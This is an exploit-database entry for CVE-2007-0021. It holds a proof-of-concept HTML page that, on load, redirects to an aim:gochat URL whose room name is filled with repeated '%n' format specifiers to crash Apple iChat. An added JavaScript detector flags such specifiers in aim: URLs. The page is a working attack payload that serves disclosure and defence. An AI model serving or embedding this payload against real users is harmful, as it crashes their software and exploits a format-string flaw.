Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)
Author: MoAB
type: dos
platform: osx
port:
date_added: 2007-01-20
date_updated: 2016-09-20
verified: 1
codes: CVE-2007-0021
tags:
aliases:
screenshot_url:
application_url:
raw file: 3166.html
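<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-20-01-2007</title>
<script>
function boom() {
    // Build the roomname value: 20 repetitions of 'A%n'.
    // escape() percent-encodes '%', so each repetition is sent as 'A%25n'.
    var str = '';
    for (var i = 0; i < 20; i++) {
        str = str + escape('A%n');
    }
    // Navigating to an aim: URL hands it to the registered URL handler.
    str = 'aim:gochat?roomname=' + str;
    window.location = str;
}
</script>
</head>
<body onload="boom()">
</body>
</html>

# milw0rm.com [2007-01-21]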
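A defensive check for the input shape this PoC produces, as an added example that is not part of the original advisory: it percent-decodes each parameter of an aim: URL once, as a URL handler would, and reports printf-style conversion specifiers. The function names and the report fields are assumptions made for this illustration.

```javascript
// Added example (not from the advisory): flag aim: URLs whose parameters
// decode to printf-style conversion specifiers such as %n, %x or %s.

// '%%' is a literal percent sign; the other branch matches a conversion:
// optional positional argument, flags, width, precision, length, conversion.
const PRINTF_SPEC =
  /%%|%(?:\d+\$)?[-+ #0']*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|L|j|z|t)?[diouxXeEfFgGaAcspn@]/g;

// Tolerant single-pass percent-decoding: valid %XX pairs become one
// character, anything else (for example a raw '%n') is left untouched.
function percentDecodeOnce(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Return every conversion specifier in text, ignoring the '%%' escape.
function findFormatSpecifiers(text) {
  return (text.match(PRINTF_SPEC) || []).filter((m) => m !== '%%');
}

// Inspect one URL. Returns null for non-aim: URLs, otherwise a report with
// the action (e.g. 'gochat') and one finding per suspicious parameter.
function inspectAimUrl(url) {
  const m = /^aim:(?:\/\/)?([^?#]*)(?:\?([^#]*))?/i.exec(url.trim());
  if (!m) return null;
  const findings = [];
  for (const pair of (m[2] || '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const name = percentDecodeOnce(eq < 0 ? pair : pair.slice(0, eq));
    const value = eq < 0 ? '' : percentDecodeOnce(pair.slice(eq + 1));
    const specs = findFormatSpecifiers(value);
    if (specs.length > 0) {
      findings.push({ param: name, count: specs.length,
                      specifiers: [...new Set(specs)] });
    }
  }
  return { action: m[1], suspicious: findings.length > 0, findings };
}

// Constructed sample: the URL shape the PoC above assembles.
const SAMPLE_URL = 'aim:gochat?roomname=' + 'A%25n'.repeat(20);
```

The same check can run in a proxy, mail gateway or HTML scanner over every `href`, `src` and script-assembled URL before it reaches a client that registers the aim: scheme.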